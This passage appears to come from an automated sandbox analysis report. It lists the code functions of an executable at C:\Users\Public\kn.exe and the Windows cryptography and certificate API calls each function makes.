    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06654 NCryptGetProperty,#360,7_2_00007FF68AD06654
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,7_2_00007FF68AC9A654
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC8FC34
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF68AC6FC20
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC59BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,7_2_00007FF68AC59BC8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACDBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF68ACDBBC0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACD3BEB
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFFB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,7_2_00007FF68ACFFB94
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,7_2_00007FF68AC5BB80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD35B90 CryptDecodeObjectEx,memmove,7_2_00007FF68AD35B90
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC35BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68AC35BA4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACDFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,7_2_00007FF68ACDFB50
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD05B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,7_2_00007FF68AD05B44
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC9BB38
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD07B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,7_2_00007FF68AD07B60
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,7_2_00007FF68AD0BB50
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFFD2C CryptDecryptMessage,GetLastError,#357,7_2_00007FF68ACFFD2C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACEDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,7_2_00007FF68ACEDD1C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,7_2_00007FF68ACC5CE8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,7_2_00007FF68ACC1C84
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC71C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,7_2_00007FF68AC71C50
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD35C54 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF68AD35C54
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC83C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68AC83C60
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,7_2_00007FF68AD0BA14
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,7_2_00007FF68ACBB9CC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF68AC5F9B8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC67988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,7_2_00007FF68AC67988
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF68ACB597C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD2B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,7_2_00007FF68AD2B980
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBB950 I_CryptGetLruEntryData,#357,7_2_00007FF68ACBB950
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8F944 CryptDecodeObject,GetLastError,#357,7_2_00007FF68AC8F944
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF9970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF68ACF9970
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC93B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,7_2_00007FF68AC93B14
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF68ACC9AF8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD35AA8 CryptDecodeObjectEx,7_2_00007FF68AD35AA8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFFA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,7_2_00007FF68ACFFA84
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACEBA50 CryptSignCertificate,SetLastError,7_2_00007FF68ACEBA50
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACD1A44
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC63A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC63A40
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACD7A70
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,7_2_00007FF68ACE9A58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD35FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF68AD35FF0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC65FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF68AC65FE8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF68ACD9F90
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF68ACD5FA8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF68ACA5F54
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF68AC6FF64
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC660DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF68AC660DA
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF68ACFE044
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF68ACA4070
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC65DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,7_2_00007FF68AC65DF7
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,7_2_00007FF68ACC1E2C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC41DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,7_2_00007FF68AC41DE8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8DD80 CertFindExtension,CryptDecodeObject,7_2_00007FF68AC8DD80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,7_2_00007FF68ACE5D80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC65DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF68AC65DA1
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD07D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,7_2_00007FF68AD07D3C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD35D74 CryptDecodeObjectEx,strcmp,strcmp,7_2_00007FF68AD35D74
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC91D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC91D70
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,7_2_00007FF68AD0BD3C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC89D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC89D6C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,7_2_00007FF68ACB3D60
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD35F20 CryptDecodeObjectEx,7_2_00007FF68AD35F20
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC87F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF68AC87F14
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF68ACC5F04
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD07EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF68AD07EE8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68ACBDEB0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF68AC8DEA4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD35E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,7_2_00007FF68AD35E3C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFDE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,7_2_00007FF68ACFDE70
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68ACD342C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF68AD0141C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC913F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,7_2_00007FF68AC913F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB53E8 CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF68ACB53E8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68ACBB3D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF68ACD3390
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68AD093A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,7_2_00007FF68ACE33B0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,7_2_00007FF68ACB33A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,7_2_00007FF68AD0739C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC8B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,7_2_00007FF68AC8B350
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC95338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68AC95338
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC67340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,7_2_00007FF68AC67340
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,7_2_00007FF68AC5B36C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC93504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,7_2_00007FF68AC93504
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF68ACD34F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD014F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,7_2_00007FF68AD014F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACEB4EC CryptDecodeObjectEx,SetLastError,7_2_00007FF68ACEB4EC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,7_2_00007FF68ACBF488
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACD9480
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFF4A0 CryptHashPublicKeyInfo,SetLastError,7_2_00007FF68ACFF4A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC35438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF68AC35438
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACEB464 CryptEncodeObjectEx,SetLastError,7_2_00007FF68ACEB464
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD07214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,7_2_00007FF68AD07214
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD29208 #357,NCryptEnumKeys,#360,#358,7_2_00007FF68AD29208
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD071C8 BCryptDestroyKey,#360,7_2_00007FF68AD071C8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF68ACD11C8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF68ACD31C0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,7_2_00007FF68ACB3188
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD07178 BCryptCloseAlgorithmProvider,#360,7_2_00007FF68AD07178
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,7_2_00007FF68ACA51A4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,7_2_00007FF68ACBF168
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF68ACB5164
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,7_2_00007FF68ACBD30C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC6D304
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,7_2_00007FF68AC6B324
